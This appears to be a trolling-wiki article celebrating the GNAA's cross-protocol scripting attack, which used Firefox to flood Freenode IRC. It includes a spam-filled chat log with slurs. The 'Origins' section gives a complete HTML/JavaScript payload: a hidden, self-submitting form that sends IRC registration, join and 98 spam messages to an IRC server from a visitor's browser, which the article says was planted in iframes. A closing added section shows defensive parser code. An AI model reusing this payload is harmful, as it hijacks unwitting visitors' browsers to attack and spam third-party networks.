
Firefox XPS IRC Attack

Security oversight leaves Freenode IRC network vulnerable to attack


  • URL: Unknown
  • Location: Freenode
  • Date: Unknown
  • Facebook: Unknown
  • Twitter: Unknown
  • Known For:
 

Summary

Operations running smoothly at Freenode

One fine day on the internet, busy researchers at the GNAA Institute of Computer Science unveiled an XPS (cross-protocol scripting) vulnerability in the Firefox browser (and, by extension, SeaMonkey) after discovering that port 6667 was, surprisingly, not banned. This vulnerability allowed an HTTP form to send IRC commands to any given network through a Firefox web browser, and thus the Firefox XPS IRC Attack began.

What happened to Freenode

Example Attack


[17:42]	-->|	Rucas (root@tor1.digineo.de) has joined #electricirc
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Electric|Master>	Hey look Chazz
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Electric|Master>	You were right :P
[17:43]	<Rucas>	Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is Rucas, and I hope you have a nice day.
[17:43]	<Chazz>	Electric|Master, lulz
[17:43]	<Heather>	Someone make him stfu
[17:43]	<Chazz>	OHAI RUCAS!
[17:43]	<Chazz>	SUP SLUUUUUUUUUUUUT@!
[17:43]	|<--	Rucas has left 192.168.1.103 (I'm too gay to be in here)
[17:43]	<Chazz>	lol
[17:43]	<Chazz>	He needs a better proxy.
[17:44]	<Chazz>	Tor fails. xD
[17:44]	<Electric|Master>	Chazz, change your ident :P
[17:44]	<Chazz>	Now, Electric|Master,
[17:44]	<Chazz>	Suggestion
[17:44]	<Chazz>	DON'T **** W/ THE HEAD OF THE ****ING GNAA
[17:44]	<Electric|Master>	lol
[17:44]	<Chazz>	I'm not joking.
[17:44]	<Electric|Master>	Chazz, duh
[17:44]	<Electric|Master>	But seriously
[17:44]	<Chazz>	Rucas = HEAD of the gnaa
[17:44]	<Electric|Master>	o_o
[17:44]	-->|	Rucas (root@tor1.digineo.de) has joined #electricirc
[17:44]	<Heather>	LOL
[17:44]	|<--	Rucas has left 192.168.1.103 (Killed (Electric|Master (shutit)))
[17:44]	<Chazz>	B
[17:44]	<Chazz>	A
[17:44]	<Chazz>	D
[17:45]	<Chazz>	
[17:45]	<Chazz>	I
[17:45]	<Chazz>	D
[17:45]	<Chazz>	E
[17:45]	<Chazz>	A
[17:45]	<Chazz>	Electric|Bot,
[17:45]	<Chazz>	* Electric|Master
[17:45]	<Electric|Master>	lol
[17:45]	<Chazz>	Don't troll the trolls.
[17:45]	[ERROR]	The command “SET\IDENT” is not known to the server.
[17:45]	<Chazz>	It means they've won.
[17:45]	<Chazz>	Which will make them troll more.
[17:45]	<Chazz>	Do you WANT to get a botnet here?
[17:45]	<Electric|Master>	no :P
[17:46]	-->|	Rucas (root@tor1.digineo.de) has joined #electricirc
[17:46]	|<--	Rucas has left 192.168.1.103 (K-Lined: GNAA)

Result

"looks like an attack" - intelligence of average Freenode user
  • Opers were linked to webpages containing the vuln and their fellow IRCops began killing them
  • Paranoia spread throughout the network
  • Large numbers of legitimate users were receiving K-lines
  • A full month passed before countermeasures were taken
  • Freenode never recovered
  • Goatse Security was formed
  • A similar vulnerability was later discovered in the Safari browser
  • lilo was just as useful protecting Freenode as he would have been alive

Origins

As detailed above, the attack was based upon the simple allowance of cross-protocol access to port 6667, the default port for IRC. An example form can be seen below.

<form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain"> 
<textarea style="display:none" id="x" name="x"></textarea>
<input type="submit" style="display:none;" />
</form>
<script type="text/javascript">
function randomString(length) {
        var chars = "abcdefghiklmnopqrstuvwxyz";
        var randomstring = '';
        for (var i=0; i<length; i++) {
                var rnum = Math.floor(Math.random() * chars.length);
                randomstring += chars.substring(rnum,rnum+1);
        }
        return randomstring;
}
n=randomString(Math.floor(Math.random()*10+3));
i=randomString(Math.floor(Math.random()*10+3));
te=document.getElementById('x');
te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN #ubuntu\n'+new Array(99).join('PRIVMSG #ubuntu :!ops Protect your rights online! Do not be squished by the leaders! Support the GNAA at irc.hardchats.com #gnaa ....... My name is '+n+', and I hope you have a nice day.\n');
te.parentNode.submit()
</script> 



Iframes containing the above were added to Last Measure, along with countless mock-blogs, to ensure the complete ruin of the Freenode IRC network.

Current status

Patches were released for IRC server software, the Firefox hole was patched, and the GNAA laughed all the way to the lulzbank.
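Why the form post worked against a lenient server, and one way a server can refuse it, shown as an added example that is not from the original page and not the actual patch of any IRC server. The function names, command lists and sample bytes are assumptions constructed for illustration.

```javascript
// Added example: names and sample bytes below are constructed, not taken from any ircd.
const HTTP_METHODS = new Set(['GET', 'POST', 'PUT', 'HEAD', 'OPTIONS', 'DELETE']);
const IRC_COMMANDS = new Set(['CAP', 'PASS', 'NICK', 'USER', 'JOIN', 'PRIVMSG', 'QUIT']);

// What the listener receives when a browser submits a text/plain form to it:
// request line, headers, blank line, then "name=value" with the value's newlines kept.
const FORM_POST = [
  'POST / HTTP/1.1',
  'Host: irc.example.net:6667',
  'Content-Type: text/plain',
  '',
  'x=',
  'USER abc 8 * :abc',
  'NICK abc',
  'JOIN #example',
].join('\r\n') + '\r\n';

// A normal client handshake, for comparison.
const REAL_CLIENT = 'CAP LS 302\r\nNICK alice\r\nUSER alice 0 * :Alice\r\n';

// Split socket data into non-empty lines (CRLF or bare LF), as an IRC parser does.
function splitLines(raw) {
  return raw.split(/\r?\n/).filter((l) => l.length > 0);
}

// First word of a line, upper-cased, skipping an optional ":source" prefix.
function commandOf(line) {
  const parts = line.trim().split(/\s+/);
  if (parts[0].startsWith(':')) parts.shift();
  return (parts[0] || '').toUpperCase();
}

// Lenient behaviour: unknown lines are answered with an error and skipped,
// so the IRC commands carried in the HTTP body are still executed.
function lenientServer(raw) {
  return splitLines(raw).map(commandOf).filter((c) => IRC_COMMANDS.has(c));
}

// Hardened behaviour: an HTTP method as a command closes the connection at once.
function strictServer(raw) {
  const executed = [];
  for (const line of splitLines(raw)) {
    const cmd = commandOf(line);
    if (HTTP_METHODS.has(cmd)) return { dropped: true, reason: line, executed };
    if (IRC_COMMANDS.has(cmd)) executed.push(cmd);
  }
  return { dropped: false, reason: null, executed };
}
```

The server-side check is the second line of defence; the browser-side fix is refusing HTTP requests to port 6667 in the first place.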


